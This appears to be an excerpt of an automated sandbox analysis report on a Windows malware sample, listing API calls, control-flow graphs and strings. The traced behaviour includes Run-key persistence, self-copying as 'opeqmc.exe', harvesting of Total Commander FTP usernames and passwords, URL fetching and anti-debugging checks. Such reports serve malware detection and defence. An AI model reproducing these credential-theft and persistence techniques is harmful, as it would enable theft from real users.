                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNELBASE(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 73 40ac20-40ac48 RegOpenKeyExW 74 40ac60-40ac76 RegOpenKeyExW 73->74 75 40ac4a-40ac55 call 4069c0 73->75 76 40ac78-40ac7a 74->76 77 40ac7c-40ac87 call 4069c0 74->77 81 40ac5a-40ac5e 75->81 79 40ac8e-40ac92 76->79 82 40ac8c-40ac8d 77->82 81->74 81->79 82->79
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 96 407727-407751 call 40d5b0 GetModuleFileNameW 99 407753-40776b call 4075d4 96->99 100 40776d-40776e 96->100 105 4077e1-4077ea 99->105 102 407774-407797 ExpandEnvironmentStringsW call 4075d4 100->102 106 40779c-4077a0 102->106 107 4077a2-4077a5 106->107 108 4077eb-4077ee 106->108 110 4077b7-4077ba 107->110 111 4077a7-4077b5 GetLastError 107->111 109 4077e0 108->109 109->105 112 4077d2-4077dc 110->112 113 4077bc-4077c8 GetLastError 110->113 114 4077ca-4077cf call 40a786 111->114 112->102 116 4077de 112->116 113->114 114->112 116->109
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 118 4077f0-407829 call 40d530 CreateProcessW
                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 128 4069c0-4069fc RegQueryValueExW RegCloseKey
                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 129 4039ea-403a14 HeapAlloc 130 403bba-403bbe 129->130 131 403a1a-403a30 GetPrivateProfileStringW 129->131 132 403bb3-403bb9 call 40be3a 131->132 133 403a36-403a42 call 40c475 131->133 132->130 133->132 138 403a48-403a5e HeapAlloc 133->138 138->132 139 403a64-403ac3 call 405511 * 5 138->139 150 403ac8-403ad7 StrStrIW 139->150 151 403b93-403ba3 call 40c495 150->151 152 403add-403aec StrStrIW 150->152 151->150 158 403ba9-403bb2 call 40be3a 151->158 152->151 153 403af2-403b03 GetPrivateProfileStringW 152->153 153->151 155 403b09-403b24 GetPrivateProfileStringW 153->155 155->151 157 403b26-403b3a GetPrivateProfileStringW 155->157 157->151 159 403b3c-403b47 call 403877 157->159 158->132 159->151 164 403b49-403b7b call 405511 call 40c3f9 159->164 169 403b90 164->169 170 403b7d-403b8b call 40c00b 164->170 169->151 170->169 173 403b8d 170->173 173->169
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                          APIs
                          • GetForegroundWindow.USER32(00427ED0,00427ED0,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A065
                          • CoCreateInstance.OLE32(0040E218,00000000,00000015,0040E238,00000001,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A07E
                          • SetForegroundWindow.USER32(00000000), ref: 0040A088
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ForegroundWindow$CreateInstance
                          • String ID:
                          • API String ID: 2498160819-0
                          • Opcode ID: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                          • Instruction ID: 3fc8f4a2167e7ffe653cafe2f971d35c6ed40139ecea7ac55ee7c5b8babae7fd
                          • Opcode Fuzzy Hash: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                          • Instruction Fuzzy Hash: E8F03C71640208FFD7049FA6CD8DC5ABBFCEF9970172009AAF101EB290D6755950DA25
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 00406CCF
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                          • Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
                          • Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                          • Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 174 40b096-40b0ac call 40d5b0 177 40b0b5-40b0bb 174->177 178 40b0ae-40b0b0 174->178 180 40b0bd-40b0cd call 407995 177->180 181 40b0cf-40b0d1 call 407951 177->181 179 40b2c9-40b2cd 178->179 185 40b0d6-40b0e5 180->185 181->185 186 40b160-40b166 185->186 187 40b0e7-40b0f1 185->187 189 40b177 InternetClearAllPerSiteCookieDecisions 186->189 190 40b168-40b175 InternetSetPerSiteCookieDecisionW 186->190 187->186 188 40b0f3-40b0f9 187->188 188->186 192 40b0fb-40b10b GetModuleFileNameW 188->192 191 40b17d-40b184 call 4032b8 189->191 190->191 199 40b186-40b196 GetLastError call 40a786 191->199 200 40b199-40b1a2 191->200 194 40b116-40b118 GetCurrentDirectoryW 192->194 195 40b10d-40b114 call 406cf9 192->195 198 40b11e-40b15a call 405511 call 4054ed call 40253c 194->198 195->198 198->178 198->186 199->200 204 40b1a9-40b1ae 200->204 207 40b1b0-40b1cd CreateThread 204->207 208 40b1ce-40b1df 204->208 207->208 208->204 210 40b1e1-40b1e7 208->210 212 40b1e9-40b1eb 210->212 213 40b1ed-40b200 call 40a786 210->213 212->213 215 40b221-40b226 212->215 222 40b202-40b209 call 40b023 213->222 223 40b20e-40b210 213->223 218 40b228-40b23b CloseHandle 215->218 219 40b23d-40b24b call 40a6c9 InternetClearAllPerSiteCookieDecisions 215->219 218->218 218->219 227 40b2c6-40b2c8 219->227 228 40b24d-40b257 219->228 222->223 223->215 225 40b212-40b21b WaitForMultipleObjects 223->225 225->215 227->179 228->227 229 40b259-40b25f 228->229 229->227 230 40b261-40b271 GetModuleFileNameW 229->230 231 40b273-40b27a call 406cf9 230->231 232 40b27c-40b27e GetCurrentDirectoryW 230->232 234 40b284-40b2c0 call 405511 call 4054ed call 40253c 231->234 232->234 234->178 234->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
